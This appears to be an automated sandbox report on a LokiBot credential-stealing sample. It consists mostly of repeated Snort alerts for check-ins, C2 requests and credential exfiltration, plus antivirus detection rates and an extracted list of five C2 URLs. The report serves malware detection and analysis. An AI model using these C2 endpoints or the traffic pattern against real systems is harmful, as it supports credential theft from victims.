Timestamp:	192.168.2.3188.114.96.749772802024313 06/09/22-12:19:18.470177
SID:	2024313
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649792802025381 06/09/22-12:19:45.858683
SID:	2025381
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749767802825766 06/09/22-12:19:08.800960
SID:	2825766
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749819802024313 06/09/22-12:20:19.468606
SID:	2024313
Source Port:	49819
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749773802825766 06/09/22-12:19:20.082461
SID:	2825766
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749851802825766 06/09/22-12:20:29.327641
SID:	2825766
Source Port:	49851
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749786802025381 06/09/22-12:19:44.361044
SID:	2025381
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749839802825766 06/09/22-12:20:25.206676
SID:	2825766
Source Port:	49839
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749797802021641 06/09/22-12:19:56.597737
SID:	2021641
Source Port:	49797
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749794802024313 06/09/22-12:19:52.723950
SID:	2024313
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749769802021641 06/09/22-12:19:11.569140
SID:	2021641
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749803802024313 06/09/22-12:20:05.555366
SID:	2024313
Source Port:	49803
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749782802021641 06/09/22-12:19:30.781711
SID:	2021641
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749810802021641 06/09/22-12:20:16.253890
SID:	2021641
Source Port:	49810
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649824802021641 06/09/22-12:20:22.688767
SID:	2021641
Source Port:	49824
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749805802825766 06/09/22-12:20:10.598374
SID:	2825766
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749770802025381 06/09/22-12:19:14.041674
SID:	2025381
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749761802025381 06/09/22-12:18:59.590864
SID:	2025381
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749769802825766 06/09/22-12:19:11.569140
SID:	2825766
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749793802024313 06/09/22-12:19:50.509118
SID:	2024313
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649824802825766 06/09/22-12:20:22.688767
SID:	2825766
Source Port:	49824
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649771802025381 06/09/22-12:19:17.236324
SID:	2025381
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649776802024313 06/09/22-12:19:23.957128
SID:	2024313
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749819802025381 06/09/22-12:20:19.468606
SID:	2025381
Source Port:	49819
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749839802021641 06/09/22-12:20:25.206676
SID:	2021641
Source Port:	49839
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749752802024313 06/09/22-12:18:54.883061
SID:	2024313
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749779802021641 06/09/22-12:19:28.006927
SID:	2021641
Source Port:	49779
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749804802024313 06/09/22-12:20:07.542975
SID:	2024313
Source Port:	49804
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649764802021641 06/09/22-12:19:02.212367
SID:	2021641
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749798802021641 06/09/22-12:19:58.002191
SID:	2021641
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649776802825766 06/09/22-12:19:23.957128
SID:	2825766
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749777802025381 06/09/22-12:19:25.204896
SID:	2025381
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649775802024313 06/09/22-12:19:22.604146
SID:	2024313
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649792802021641 06/09/22-12:19:45.858683
SID:	2021641
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749785802825766 06/09/22-12:19:42.634597
SID:	2825766
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649751802825766 06/09/22-12:18:53.097950
SID:	2825766
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749794802825766 06/09/22-12:19:52.723950
SID:	2825766
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649820802024313 06/09/22-12:20:20.867617
SID:	2024313
Source Port:	49820
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749779802825766 06/09/22-12:19:28.006927
SID:	2825766
Source Port:	49779
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.7

Timestamp:	192.168.2.3188.114.97.749765802025381 06/09/22-12:19:04.748877
SID:	2025381
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749817802021641 06/09/22-12:20:18.206399
SID:	2021641
Source Port:	49817
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749748802025381 06/09/22-12:18:50.155870
SID:	2025381
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749851802024313 06/09/22-12:20:29.327641
SID:	2024313
Source Port:	49851
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649801802024313 06/09/22-12:20:02.469935
SID:	2024313
Source Port:	49801
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649768802025381 06/09/22-12:19:10.383861
SID:	2025381
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749766802825766 06/09/22-12:19:06.967493
SID:	2825766
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749773802025381 06/09/22-12:19:20.082461
SID:	2025381
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749772802825766 06/09/22-12:19:18.470177
SID:	2825766
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749767802025381 06/09/22-12:19:08.800960
SID:	2025381
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749807802024313 06/09/22-12:20:13.436189
SID:	2024313
Source Port:	49807
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749784802024313 06/09/22-12:19:39.004620
SID:	2024313
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649792802825766 06/09/22-12:19:45.858683
SID:	2825766
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749832802024313 06/09/22-12:20:23.981118
SID:	2024313
Source Port:	49832
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749766802021641 06/09/22-12:19:06.967493
SID:	2021641
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749745802025381 06/09/22-12:18:46.752225
SID:	2025381
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749772802021641 06/09/22-12:19:18.470177
SID:	2021641
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: ZciowjM9hN.exe	Virustotal: Detection: 57%			Perma Link
Source: ZciowjM9hN.exe	ReversingLabs: Detection: 65%

Antivirus detection for URL or domain

Source: http://vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.phpv	Avira URL Cloud: Label: phishing
Source: http://vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php	Avira URL Cloud: Label: phishing

Multi AV Scanner detection for domain / URL

Source: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	Virustotal: Detection: 16%			Perma Link
Source: http://vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php	Virustotal: Detection: 19%			Perma Link

Machine Learning detection for sample

Source: ZciowjM9hN.exe

Joe Sandbox ML: detected

Source: 00000000.00000002.320864027.0000000003C05000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php"]}

Source: ZciowjM9hN.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: ZciowjM9hN.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\ZciowjM9hN.exe

Code function: 9_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

9_2_00403D74

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49745 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49745 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49745 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49745 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49748 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49748 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49748 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49748 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49751 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49751 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49751 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49751 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49752 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49752 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49752 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49752 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49761 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49761 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49761 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49761 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49764 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49764 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49764 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49764 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49765 -> 188.114.97.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49765 -> 188.114.97.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49765 -> 188.114.97.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49765 -> 188.114.97.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49766 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49766 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49766 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49766 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49767 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49767 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49767 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49767 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49768 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49768 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49768 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49768 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49769 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49769 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49769 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49769 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49770 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49770 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49770 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49770 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49771 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49771 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49771 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49771 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49772 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49772 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49772 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49772 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49773 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49773 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49773 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49773 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49774 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49774 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49774 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49774 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49775 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49775 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49775 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49775 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49776 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49776 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49776 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49776 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49777 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49777 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49777 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49777 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49778 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49778 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49778 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49778 -> 188.114.97.6:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49779 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49779 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49779 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49779 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49782 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49782 -> 188.114.96.7:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49782 -> 188.114.96.7:80
